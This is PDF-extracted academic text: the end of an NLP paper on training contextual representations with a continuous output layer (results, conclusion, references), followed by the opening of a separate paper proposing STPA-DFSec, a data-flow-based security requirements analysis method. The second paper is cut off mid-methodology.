training time in seconds. For other models, we report the relative training time compared to CONT. OOM means that the GPU memory is not sufficient. CONT shows substantial speedup over common baselines under all scenarios. 5.2.2 The Continuous Output Layer with Different Sequence Encoders For this experiment, we pair the output layers with different sequence encoders and investigate their training time. We start from a single-layer LSTM with a hidden size of 2048 (LSTM) and a two-layer version (LSTMX2), both reported in Grave et al. (2016). They are all smaller than the sequence encoder used in ELMO. We then scale up to the forward and backward Transformer reported in Peters et al. (2018b) (TRANS BASE) and the multi-layer LSTM with projection in ELMO(ELMO). Finally, we test two larger Trans- former, TRANS LARGE, a scaled-up version of TRANS BASE, and a uni-directional Transformer (denoted as GPT) with the same size as BERTBASE (Devlin et al., 2019) and GPT (Radford et al., 2018), respectively. For all models but GPT, the lengths of the input sequences are fixed at 20. For GPT, we use input sequences of length 512, following its original setting. For ADAPTIVE and SAMPLED, we fix the vocabulary size at 800K. We report the training time of each model using four GPU cards and the maximal batch size (S3) in Table 5. We find that the continuous output layer remains attractive, even when the sequence encoder is as large as GPT. In that case, the speedup of CONT over SUBWORD, ADAPTIVE, and SAMPLED is still substantial (1.44x - 8.31x). In addition, we observe that for sequence encoders of the same type, more complex they get, less speedup CONT enjoys, which is expected. For instance, from LSTM to LSTMX2, the speedup of CONT decreases noticeably. However, the speedup the continuous output brings also depends on the architecture of the sequence encoder. For instance, though TRANS BASE and TRANS LARGE are more complex than LSTMX2, CONT enjoys larger speedup with those transformers. Profiling the training process of sequence decoders such as LSTM and the Transformer on GPU devices is an interesting research topic but out of the scope of this study. 6 Conclusion We introduced an efficient framework to learn contextual representation without the softmax layer. The experiments with ELMo showed that we significantly accelerate the training of the current models while maintaining competitive performance on various downstream tasks. Acknowledgments We wish to thank the anonymous reviewers, the editor, Mark Yatskar, Muhao Chen, Xianda Zhou, and members at UCLANLP lab for helpful comments. We also thank Yulia Tsvetkov and Sachin Kumar for help with implementing the continuous output layer as well as Jieyu Zhao, Kenton Lee, and Nelson Liu for providing re- producible source code for experiments. This work was supported by National Science Foundation grant IIS-1760523 and IIS-1901527. References Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. 2016. Layer normalization. arXiv preprint arXiv:1607.06450. Yoshua Bengio and Jean-Sébastien Senécal. 2003. Quick training of probabilistic neural nets by importance sampling. In AISTATS. 621 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 Samuel R. Bowman, Gabor Angeli, Christopher Potts, and Christopher D. Manning. 2015. A large annotated corpus for learning natural language inference. In EMNLP. James Bradbury, Stephen Merity, Caiming Xiong, and Richard Socher. 2016. Quasi-recurrent neu- ral networks. arXiv preprint arXiv:1611.01576. Ciprian Chelba, Tomas Mikolov, Mike Schuster, Qi Ge, Thorsten Brants, Phillipp Koehn, and Tony Robinson. 2013. One billion word bench- mark for measuring progress in statistical lan- guage modeling. arXiv preprint arXiv:1312.3005. Mia Xu Chen, Orhan Firat, Ankur Bapna, Melvin Johnson, Wolfgang Macherey, George Foster, Llion Jones, Mike Schuster, Noam Shazeer, Niki Parmar, Ashish Vaswani, Jakob Uszkoreit, Lukasz Kaiser, Zhifeng Chen, Yonghui Wu, and Macduff Hughes. 2018. The best of both worlds: Combining recent advances in neural machine translation. In ACL. Qian Chen, Xiaodan Zhu, Zhen-Hua Ling, Si Wei, Hui Jiang, and Diana Inkpen. 2017. Enhanced LSTM for natural language inference. In ACL. Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel P. Kuksa. 2011. Natural language processing (almost) from scratch. Journal of Machine Learn- ing Research, 12:2493–2537. Yann N. Dauphin, Angela Fan, Michael Auli, and David Grangier. 2017. Language modeling with gated convolutional networks. In ICML. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. 2019. BERT: Pre-training of deep bidirectional transformers for language understanding. In NAACL-NLT . John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. Journal of Machine Learning Research, 12:2121–2159. Matt Gardner, Joel Grus, Mark Neumann, Oyvind Tafjord, Pradeep Dasigi, Nelson F. Liu, Matthew E. Peters, Michael Schmitz, and Luke Zettlemoyer. 2018. AllenNLP: A deep semantic natural language processing platform. arXiv preprint arXiv:1803.07640. Priya Goyal, Piotr Dollár, Ross Girshick, Pieter Noordhuis, Lukasz Wesolowski, Aapo Kyrola, Andrew Tulloch, Yangqing Jia, and Kaiming He. 2017. Accurate, large minibatch SGD: training Imagenet in 1 hour. arXiv preprint arXiv:1706.02677. Edouard Grave, Armand Joulin, Moustapha Cissé, David Grangier, and Hervé Jégou. 2016. Effi- cient softmax approximation for GPUs. arXiv preprint arXiv:1609.04309. Luheng He, Kenton Lee, Mike Lewis, and Luke Zettlemoyer. 2017. Deep semantic role label- ing: What works and what’s next. In ACL. Shexia He, Zuchao Li, Hai Zhao, and Hongxiao Bai. 2018. Syntax for semantic role labeling, to be, or not to be. In ACL. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9:1735–1780. Yacine Jernite, Samuel R Bowman, and David Sontag. 2017. Discourse-based objectives for fast unsupervised sentence representation learn- ing. arXiv preprint arXiv:1705.00557. Ian Jolliffe. 2011. Principal component analysis. In International Encyclopedia of Statistical Science, Springer Berlin Heidelberg. Rafal Jozefowicz, Oriol Vinyals, Mike Schuster, Noam Shazeer, and Yonghui Wu. 2016. Explor- ing the limits of language modeling. arXiv pre- print arXiv:1602.02410. Yoon Kim, Yacine Jernite, David Sontag, and Alexander M. Rush. 2016. Character-aware neural language models. In AAAI. Ryan Kiros, Yukun Zhu, Ruslan R. Salakhutdinov, Richard Zemel, Raquel Urtasun, Antonio Torralba, and Sanja Fidler. 2015. Skip-thought vectors. In NIPS. Nikita Kitaev and Dan Klein. 2018. Multilingual constituency parsing with self-attention and pre-training. arXiv preprint arXiv:1812.11760. Sachin Kumar and Yulia Tsvetkov. 2019. Von Mises-Fisher loss for training sequence to sequence models with continuous outputs. In ICLR. 622 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 Kenton Lee, Luheng He, Mike Lewis, and Luke Zettlemoyer. 2017. End-to-end neural coref- erence resolution. In EMNLP. Kenton Lee, Luheng He, and Luke Zettlemoyer. 2018. Higher-order coreference resolution with coarse-to-fine inference. In NAACL-HLT . Tao Lei, Yu Zhang, Sida I. Wang, Hui Dai, and Yoav Artzi. 2018. Simple recurrent units for highly parallelizable recurrence. In EMNLP. Omer Levy and Yoav Goldberg. 2014. Neural word embedding as implicit matrix factorization. In NIPS. Lajanugen Logeswaran and Honglak Lee. 2018. An efficient framework for learning sentence representations. ICLR. Bryan McCann, James Bradbury, Caiming Xiong, and Richard Socher. 2017. Learned in translation: Contextualized word vectors. In NIPS. Stephen Merity, Nitish Shirish Keskar, and Richard Socher. 2018. An analysis of neural language modeling at multiple scales. arXiv preprint arXiv:1803.08240. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word representations in vector space. arXiv preprint arXiv:1301.3781. Tomas Mikolov, Edouard Grave, Piotr Bojanowski, Christian Puhrsch, and Armand Joulin. 2017. Advances in pre-training distributed word rep- resentations. arXiv preprint arXiv:1712.09405. A Mnih and YW Teh. 2012. A fast and simple algorithm for training neural probabilistic language models. In ICML. Frederic Morin and Yoshua Bengio. 2005. Hier- archical probabilistic neural network language model. In AISTATS. Alexander Panchenko, Eugen Ruppert, Stefano Faralli, Simone Paolo Ponzetto, and Chris Biemann. 2017. Building a web-scale dependency- parsed corpus from CommonCrawl. arXiv preprint arXiv:1710.01779. Matthew E. Peters, Mark Neumann, Mohit Iyyer, Matt Gardner, Christopher Clark, Kenton Lee, and Luke Zettlemoyer. 2018a. Deep contex- tualized word representations. In NAACL-HLT . Matthew E. Peters, Mark Neumann, Luke Zettlemoyer, and Wen-tau Yih. 2018b. Dissect- ing contextual word embeddings: Architecture and representation. In EMNLP. Yuval Pinter, Robert Guthrie, and Jacob Eisenstein. 2017. Mimicking word embeddings using sub- word RNNs. In EMNLP. Sameer Pradhan, Alessandro Moschitti, Nianwen Xue, Hwee Tou Ng, Anders Björkelund, Olga Uryupina, Yuchen Zhang, and Zhi Zhong. 2013. Towards robust linguistic analysis using OntoNotes. In CoNLL. Sameer Pradhan, Alessandro Moschitti, Nianwen Xue, Olga Uryupina, and Yuchen Zhang. 2012. CoNLL-2012 shared task: Modeling multi- lingual unrestricted coreference in ontonotes. In Joint Conference on EMNLP and CoNLL- Shared Task. Alec Radford, Karthik Narasimhan, Tim Salimans, and Ilya Sutskever. 2018. Improving language understanding by generative pre-training. OpenAI Blog. Alec Radford, Jeffrey Wu, Rewon Child, David Luan, Dario Amodei, and Ilya Sutskever. 2019. Language models are unsupervised multitask learners. OpenAI Blog. Pranav Rajpurkar, Jian Zhang, Konstantin Lopyrev, and Percy Liang. 2016. SQuAD: 100, 000+ questions for machine comprehension of text. In EMNLP. Erik F Sang and Fien De Meulder. 2003. Introduc- tion to the CoNLL-2003 shared task: Language- independent named entity recognition. arXiv preprint cs/0306050. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016. Neural machine translation of rare words with subword units. In ACL. Richard Socher, Alex Perelygin, Jean Wu, Jason Chuang, Christopher D. Manning, Andrew Y. Ng, and Christopher Potts. 2013. Recursive deep models for semantic compositionality over a sentiment treebank. In EMNLP. 623 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 Emma Strubell, Ananya Ganesh, and Andrew McCallum. 2019. Energy and policy consid- erations for deep learning in NLP. arXiv preprint arXiv:1906.02243. Shuai Tang, Hailin Jin, Chen Fang, Zhaowen Wang, and Virginia de Sa. 2018. Speeding up context- based sentence representation learning with non-autoregressive convolutional decoding. In Workshop on Representation Learning for NLP. Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In NIPS. Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey, Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Lukasz Kaiser, Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens, George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith, Jason Riesa, Alex Rudnick, Oriol Vinyals, Gregory S. Corrado, Macduff Hughes, and James A. Dean. 2016. Google’s neural machine translation system: Bridging the gap between human and machine translation. arXiv preprint arXiv:1609.08144. Zhilin Yang, Zihang Dai, Ruslan Salakhutdinov, and William W. Cohen. 2017. Breaking the soft- max bottleneck: A high-rank RNN language model. arXiv preprint arXiv:1711.03953. Yang You, Zhao Zhang, Cho-Jui Hsieh, James Demmel, and Kurt Keutzer. 2018. ImageNet training in minutes. In Proceedings of the 47th International Conference on Parallel Process- ing, ICPP 2018. 624 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 Introduction Background and Related Work Approach Computational Efficiency Learning with Continue Outputs Overall Training Time Open-Vocabulary Training Interpretation of Learning Contextual Encoders with Continuous Outputs Experiment Setup Main Results Analysis Effect of the Pre-trained Embedding Computational Efficiency Speedup Breakdown The Continuous Output Layer with Different Sequence Encoders Conclusion work_47xmn44k3nccdfwsrtmwbae6ky ---- Data-flow-based adaption of the System-Theoretic Process Analysis for Security (STPA-Sec) Data-flow-based adaption of the System-Theoretic Process Analysis for Security (STPA-Sec) Jinghua Yu1,2, Stefan Wagner2 and Feng Luo1 1 School of Automotive Studies, Tongji University, Shanghai, China 2 Institute of Software Engineering, University of Stuttgart, Stuttgart, Germany ABSTRACT Security analysis is an essential activity in security engineering to identify potential system vulnerabilities and specify security requirements in the early design phases. Due to the increasing complexity of modern systems, traditional approaches lack the power to identify insecure incidents caused by complex interactions among physical systems, human and social entities. By contrast, the System-Theoretic Process Analysis for Security (STPA-Sec) approach views losses as resulting from interactions, focuses on controlling system vulnerabilities instead of external threats, and is applicable for complex socio-technical systems. However, the STPA-Sec pays less attention to the non-safety but information-security issues (e.g., data confidentiality) and lacks efficient guidance for identifying information security concepts. In this article, we propose a data-flow-based adaption of the STPA-Sec (named STPA-DFSec) to overcome the mentioned limitations and elicit security constraints systematically. We use the STPA-DFSec and STPA-Sec to analyze a vehicle digital key system and investigate the relationship and differences between both approaches, their applicability, and highlights. To conclude, the proposed approach can identify information-related problems more directly from the data processing aspect. As an adaption of the STPA-Sec, it can be used with other STPA-based approaches to co-design systems in multi-disciplines under the unified STPA framework. Subjects Computer Networks and Communications, Security and Privacy, Software Engineering Keywords Security analysis, Complex interaction, Information-critical system, Data flow structure, STPA-Sec INTRODUCTION System security is an emergent property of the system, which represents a state or condition that is free from asset loss and the resulting loss consequences. System security engineering, as a special discipline of system engineering, coordinates and directs various engineering specialties to provide a fully integrated, system-level perspective of system security and helps to ensure the application of appropriate security principles and methodologies during the system life cycle for asset protection (Ross, McEvilley & Oren, 2016). Violating system security constraints causes unexpected incidents, like mission failure or leaking sensitive information, and finally leads to financial or even life losses. Therefore, security needs to be considered carefully in system design. Security requirement analysis, referring to the activity of analyzing systems in security-related aspects to How to cite this article Yu J, Wagner S, Luo F. 2021. Data-flow-based adaption of the System-Theoretic Process Analysis for Security (STPA-Sec). PeerJ Comput. Sci. 7:e362 DOI 10.7717/peerj-cs.362 Submitted 5 November 2020 Accepted 29 December 2020 Published 3 February 2021 Corresponding author Jinghua Yu, yujinghua@tongji.edu.cn Academic editor Leandros Maglaras Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.362 Copyright 2021 Yu et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.362 mailto:yujinghua@�tongji.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.362 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ achieve security requirements in this research, is performed in the early security engineering phase and helps to manage system risks and make decisions. Traditional security analysis approaches, being designed for former relatively simple systems, are not effective to analyze increasingly complex systems. For example, a modern vehicle is a Cyber-Physical System, which consists of not only tens of thousands of physical components but also large amounts of software codes. A vehicle Over-The-Air software update system, as a Socio-Technical System, refers to not only the technical parts but also social entities like data providers and regulations. However, most traditional approaches start with system decomposition and analyze the components independently, which leads to overlooking the impacts of interactions among components. Besides, traditional causality models attribute accidents to an initial component failure cascading through a set of other components (like dominos) (Young & Leveson, 2014) and cannot address causes of losses with non-linear cause-and-effect linkages. To meet the requirements of modern systems, a relatively new approach for safety engineering called System-Theoretic Process Analysis (STPA) was proposed (Leveson & Thomas, 2018) and its extension for security named STPA-Sec was presented later (Young & Leveson, 2013). However, the STPA-Sec does not consider non-safety but security-critical issues (e.g., data confidentiality) and lacks efficient guidance for identifying information security concepts. Therefore, we propose a data-flow-based adaption of the STPA-Sec (named STPA-DFSec) to overcome the mentioned STPA-Sec’s limitations. The analysis process of a vehicle digital key system is presented to demonstrate how to use the proposed approach. We also analyze the same system by using the original STPA-Sec and compare their outcomes. Finally, we discover the relationship between concepts in both approaches and conclude the highlights and applicability of them. The rest of this article is organized as follows. In the “Related Work” section, we introduce the established approaches and the STPA series with research gaps. In the “Methodology” section, we briefly describe the STPA and STPA-Sec approaches and propose the adaption in detail. In the “Case Study” section, we present the analysis processes of an example case by using both original and adapted approaches to demonstrate how to use them and make the comparison. Finally, we summary this article in the “Conclusion” section. RELATED WORK Established security requirement analysis approaches We compare established approaches (other than the STPA-based ones) for security requirement analysis from several industry guidelines, like SAE J3061 (SAE, 2016) in the automotive industry and NIST cybersecurity framework for critical infrastructure (NIST, 2018), as well as other published research. Note that not all approaches use the term “requirements” explicitly. We regard all the activities that aim to identify security requirements as relevant approaches. For example, threat analysis and risk assessment (TARA) is a typical activity for analyzing security problems. The outputs of TARA are the Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 2/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ source of security requirements. Table 1 summarizes the investigated approaches with brief introductions and categories. With regard to the starting point, most of the mentioned approaches are threat- oriented. They start with identifying threat-related items (e.g., threat source or attack interface) of the system assets or operation scenarios. This is from the point of view of an attacker and aims to protect the system by analyzing and handling all enumerated external threats. Another type is the system-oriented one, which starts with analyzing the system features (incl. structure, function or use case) and tries to find vulnerabilities of the system. Threat-oriented approaches are well-structured and have been widely used in various industries. It is efficient to protect the system against known threats based on a threat database and expert experience. However, threat-oriented ways are not efficient for relatively new systems with less previous experience, and may overlook new kinds of threats. By contrast, the system-oriented approaches are more likely to handle such situations by identifying system vulnerabilities and focusing on controlling potential vulnerabilities relying less on the threat database. Besides, since the external threats are continuously developing, the system-oriented ways are more efficient to ensure the system operation without being compromised regardless of the source and type of threats, just like defending a castle by reinforcing walls and not caring who is the enemy. Furthermore, the system-oriented approaches are more useful for high-level decisions since they view the issues from the perspective of the whole system. Table 1 Summary of established security analysis approaches other than STPA-based ones. Brief Introduction of established security analysis approaches (other than STPA-based ones) with their categories. Approach Brief introduction Category NIST cybersecurity framework method (NIST, 2018) Cybersecurity Framework is a risk-based approach to managing cybersecurity risks of critical infrastructure published by the National Institute of Standards and Technology (NIST). Five functions of the framework core are “Identify”, “Protect”, “Detect”, “Respond”, and “Recover” Threat-oriented; Component-based EVITA TARA process (Ruddle et al., 2009) EVITA TARA method was proposed in the E-Safety Vehicle Intrusion Protected Applications (EVITA) project, which aims to design, verify, and prototype a secure architecture for automotive on-board networks Threat-oriented; Scenario-based TVRA process (ETSI, 2017) Threat, Vulnerabilities, and implementation Risks Analysis (TVRA) is a process-driven TARA methodology developed by the European Telecommunications Standards Institute (ETSI) Threat-oriented; Component-based OCTAVE Allegro (Caralli et al., 2007) OCTAVE Allegro is a streamlined approach for information assets, as an agile variant of the Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE), which was developed by the Software Engineering Institute and sponsored by the U.S. Department of Defense Threat-oriented; Component-based HEAVENS TARA process (Olsson, 2016) HEAling Vulnerabilities to ENhance Software Security and Safety (HEAVENS) is a systematic approach of deriving security requirements for vehicle E/E systems, including processes and tools supporting for TARA Threat-oriented; Scenario-based FMVEA (Schmittner et al., 2014) Failure Mode, Vulnerabilities and Effects Analysis (FMVEA) is an approach evolved from the Failure Mode and Effect Analysis (FMEA) to identify vulnerability cause-effect chains, which consists of vulnerabilities, threat agent, threat mode, threat effect, and attack probability Threat-oriented; Component-based CHASSIS (Raspotnig, Karpati & Katta, 2012) Combined Harm Assessment of Safety and Security for Information Systems (CHASSIS) is a unified process for identifying hazardous scenarios by using UML-based models (misuse cases and sequence diagrams) System-oriented; Scenario-based Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 3/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ With regard to the basic analysis object, the mentioned approaches can also be divided into component-based and scenario-based classes. The former class views the system as the composition of a set of assets and aims to protect them to achieve the system security, while the latter class focuses on the functional operation of a system and aims to ensure the expected system behaviors. The component-based approaches can protect essential components well and are convenient for the development management since different teams can be responsible for certain components. However, such approaches lack the consideration of the interaction among components. Each component can be secure but attacks may still happen during the interactions. By contrast, the scenario-based approaches consider the interaction among components and focus on providing secure services instead of protecting system components. Such approaches require a global design consideration and more management efforts for cooperation between different development teams. The previously mentioned approaches are at the process or framework level. Many concrete techniques are used in practice when applying these frameworks. For example, HEAVENS and FMVEA use Microsoft’s STRIDE model (Microsoft, 2009) to identify potential threats. The attack tree analysis is used in the EVITA process to analyze attacks in depth and obtain attack scenarios (Ruddle et al., 2009). The Threat and Operability Analysis (THROP) can be used in the threat identification phase when applying the EVITA process at the feature level (SAE, 2016). Since the proposed approach in this article is at the framework level, techniques used in certain steps are only listed here as examples without further investigation. System-theoretic process analysis based approaches and highlights STPA is a hazard analysis approach based on the System-Theoretic Accident Model and Process (STAMP), which views losses as results from interactions among various system roles that lead to violations of safety constraints and analyzes issues at the strategy level. STPA provides a powerful way to deal with complexity by using traceable hierarchical abstraction and refinement (Young & Leveson, 2014). Other than safety engineering, STPA has also been extended into other fields with the same system-theoretic thought. Young & Leveson (2013) presented STPA for Security (STPA-Sec), which shares similar steps with STPA and focuses on controlling system vulnerabilities instead of avoiding threats. To perform co-analysis of safety and security under the STPA framework better, Friedberg et al. (2017) proposed a novel analysis methodology called STPA-SafeSec, which integrates STPA and STPA-Sec into one concise framework and overcomes limitations of original approaches (e.g., no considerations about non-safety security issues) by introducing security constraints and mapping abstract control structures to real components. Shapiro (2016) proposed STPA for Privacy (STPA-Priv), which extends STPA into privacy engineering by introducing privacy concepts and considerations into the general STPA process steps. The most significant highlight of STPA-based approaches is that they shift from focusing on preventing failures and avoiding threats to enforcing safety constraints and controlling system vulnerabilities. Controlling system vulnerabilities rather than reacting Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 4/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ to threats is more efficient to ensure system security because controlling a vulnerability may reduce the attack risk of several threats. Another highlight is that the STPA-based approaches focus more on the strategy level rather than the tactic level. The tactics are means to accomplish a specific action and are focused on physical threats, while the strategy is regarded as the art of gaining continuing advantages and is focused on abstract outcomes (Young & Leveson, 2014). The strategy view is beneficial to broaden the mind and take more aspects like organizational and managerial ones into account. Therefore, the STPA-based approaches are applicable for socio-technical systems and suitable for today’s complex systems. Not only physical system components but also humans, natural or social environment and their interactions are all within the scope of the STPA-based approaches. Furthermore, due to the numbers of extensions of STPA in various disciplines, it is easier to perform co-design under the same STPA framework. STPA-Sec applications and gaps The STPA-based security analysis approach (STPA-Sec) has been used to identify system security constraints in various industries. Khan, Madnick & Moulton (2018) demonstrated the implementation of STPA-Sec to identify security vulnerabilities of a central utilities plant gas turbine use case in industrial control systems. Mailloux et al. (2019) used the STPA-Sec to elicit systems security requirements for a notional autonomous space system. Carter et al. (2018) used STPA-Sec with a previous information elicitation process to analyze a small reconnaissance unmanned aerial vehicles. A further modeling technique has also been proposed by the same researchers to support a more efficient and traceable analysis (Carter et al., 2019). Sidhu (2018) applied an STPA-Sec extension with modified attack tree method to analyze cybersecurity of autonomous mining systems. Wei & Madnick (2018) analyzed an over-the-air software update use case in the automotive industry by using both STPA-Sec and CHASSIS and compared analysis outcomes. The STPA-Sec is system-oriented and scenario-based. It has previously mentioned advantages of both system-oriented and scenario-based approaches. Comparing to another system-oriented scenario-based approach CHASSIS, the STPA-Sec views the system from the perspective of the control actions and addresses more strategic issues, while the CHASSIS analyzes the system from the functional use case aspects and pays more attention to tactical problems. Besides, the CHASSIS is more suitable for technical development phases since use cases and sequence diagrams are required when applying it. By contrast, STPA-Sec can be performed at a high system level in the concept phase, in which fewer technical documents are available. Nevertheless, two limitations of the STPA-Sec have been found. First, it does not pay enough attention to the non-safety-related but security-critical issues, like data confidentiality. The first reason for causing such ignoring is that the security of the control action channels is not considered in the STPA-Sec. For example, in a water cooling system, “increase the water flow” is a typical action to control the system temperature. The STPA-Sec only analyzes insecure possibilities related to this action at a functional level but does not consider the possible insecure factors of the channels which deliver the Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 5/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ control information (or called commands) from the controller to the controlled process. Another reason for ignoring some security aspects is that some objects, which are not related to the control process (i.e., not presented in the control loop structure (Fig. 1)), are not considered. For example, in a vehicle software update system, “request” and “response” are the main control actions between the controller (e.g., an external tester) and the controlled process (e.g., electronic control units in a vehicle). The STPA-Sec mainly focuses on factors that may lead to losses related to these two control actions (e.g., an illegal request is accepted or a valid response is dropped). However, whether the data during the request or response is monitored illegally can not be identified directly by the STPA-Sec since the data confidentiality is not presented in the system STAMP model. The second limitation is that it lacks guidance when identifying information- security-related concepts including insecure behaviors and intended causal scenarios. The STPA-Sec inherits the STPA guide words to identify insecure control actions and uses components and interactions in the control loop as the “clues” to generate viable scenarios (Young & Leveson, 2013). Such safety-oriented identification methods may not efficient and direct to address information security problems. Other researchers also pointed out similar limitations of the STPA-Sec. Schmittner, Ma & Puschner (2016) reported that the original STPA-Sec lacks guidance for intended causal scenarios, excludes considerations of the data exchange which is not directly connected to the process control and cannot cover more information-security centric properties such as confidentiality. Torkildson, Li & Johnsen (2019) also found that some essential security issues can be overlooked and recommended to strengthen STPA-Sec by combining it with data-flow-based threat models. However, Torkildson’s approach converts the STPA control structure into a data flow diagram by simply replacing control action and feedback paths with data channels. Although such a data flow diagram helps to identify more data-related threats than using STPA-Sec alone, this diagram based on the original control loop does not view the system from the data aspect initially and may also overlook security issues that are not related to the control processes. Controller Controlled Process Control Algorithm Process Model Control Actions Feedback Actuator Sensor Figure 1 General control loop (Karatzas & Chassiakos, 2020). General control loop structure of the STPA framework. Full-size DOI: 10.7717/peerj-cs.362/fig-1 Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 6/21 http://dx.doi.org/10.7717/peerj-cs.362/fig-1 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ Furthermore, the STPA-Sec approach regards the security issue as one of the key threats affecting system safety (Wei & Madnick, 2018) and only supports the identification of safety-related security goals (Martin et al., 2017). Non-safety-related security issues like confidentiality may be overlooked. To sum up, the STPA-Sec can address safety-related security problems, while the proposed STPA-DFSec reorients the scope of the STPA-based security analysis approach to consider more non-safety-related but information security problems. Furthermore, efficient guidance is needed to better support such information security analysis based on the STPA framework. METHODOLOGY Brief introduction of STPA and STPA-Sec We briefly introduce the original STPA framework as the basis of the proposed approach in this section. STPA starts with defining the purpose of the analysis, including system-level losses, hazards, and constraints. Losses are about something valuable and unacceptable to the stakeholders. A hazard is a system state or set of conditions that, together with a particular set of worst-case environmental conditions, will lead to a loss. Finally, system constraints can be derived from identified hazards, which specify system conditions or behaviors that need to be satisfied to prevent hazards and ultimately prevent losses (Leveson & Thomas, 2018). Then, the control structure needs to be built to describe relationships and interactions by modeling the system as a set of control loops (show in Fig. 1). The third step is to identify unsafe control actions, which will lead to a hazard in a particular context and worst-case environment (Leveson & Thomas, 2018), based on the previously built structure. Four ways of being unsafe are provided in STPA as guide words for the identification. Finally, loss scenarios, which describe the causal factors that can lead to unsafe control actions, are identified. Two types of loss scenarios must be considered, which are “scenarios that lead to unsafe control actions” and “scenarios in which control actions are improperly executed or not executed” (Leveson & Thomas, 2018). Each identified scenario represents a system failure that needs to be controlled by designers. The STPA-Sec, as an extension for security considerations, shares the same basic steps. Vulnerabilities, instead of hazards, are identified in the first step since vulnerabilities lead to security incidents, which is just like hazards lead to safety incidents (Young & Leveson, 2013). Similarly, final identified loss scenarios represent system vulnerabilities that need to be controlled. STPA-DFSec approach The proposed STPA-DFSec follows the general STPA framework but introduces a data-flow-based structure for information security considerations. The main steps are described as follows. Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 7/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ Step 1: Define the purpose of the analysis Being similar to the STPA-Sec, the first step is to identify system-level losses, vulnerabilities, and constraints to figure out what are unacceptable results that need to be avoided at the system strategy level. To help to identify losses, the STPA-DFSec provides general guidance for loss identification based on the study (Yu & Luo, 2020) of various safety- and security-related definitions from standards and technical documents in industries like ISO 26262 (ISO, 2018) and SAE J3061 guidebook (SAE, 2016). All possibilities of losses at a high abstract level are listed in Table 2. The loss list of a particular case is a subset of this general list and can be described concretely according to practical situations. Vulnerabilities are system weaknesses that may lead to losses under external force. General security attributes like confidentiality, integrity, and availability (called C.I.A. Triad Model) can be used as guide words to classify the security problems and elicit potential vulnerabilities. Finally, system-level constraints can be easily obtained by simply inversing the vulnerabilities or describing how to minimize the losses if the vulnerabilities are exploited (Leveson & Thomas, 2018). Step 2: Model functional interaction structure Instead of the control structure, a Functional Interaction Structure (FIS) based on data flows is created to interpret how the system works from the perspective of data flows. We choose the data-flow-based diagram because data is the carrier of information. To view a system from the perspective of data flows is a more direct and efficient way to consider information security problems. A component can be decomposed into a set of functions. Each function is a basic data process unit to handle the input data and output processed data. Data flow channels are the bridges between different functions to exchange information to finally accomplish overall system missions. The interactions between FIS components are viewed as the data exchanges between peer functions in different components. The data flow channels between different components are via the physical communication channels (e.g., cables and wireless channels), while the interactions among functions in one component go through the logical channels (e.g., via global variants and function parameters). A function works based on its inputs and algorithms and outputs results. The processing environment, together with inputs and algorithms, will affect function behaviors and final outputs. Inputs and outputs, instead of control actions and feedback, Table 2 General list of losses. Recommended high-level losses for the initial loss identification step. Label Loss Description L-1 Loss of life or cause injury to life Includes human and animal life L-2 Loss of physical property Represents physical objects belonging to stakeholders (e.g., devices) L-3 Loss of non-physical property Represents virtual properties belonging to stakeholders (e.g., sensitive information, reputation) L-4 Loss of environment Includes the natural or artificial world Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 8/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ are interactions between components in FIS. Figure 2 shows a general interaction structure with arrows as data flows and the elements of a function. The FIS is created based on high-level system description files, which describe the overall system purpose, general architecture with main components, and functional requirements related to the data process. How concrete an FIS is depends on how detailed the description files are. Functions in an FIS are identified from the perspective of the data process. A common function set (see Table 3) is provided to help the establishment of the system FIS. The enumerated cryptography-related functions are derived from the cryptographer’s toolbox, which consists of six kinds of cryptography mechanisms (symmetric key 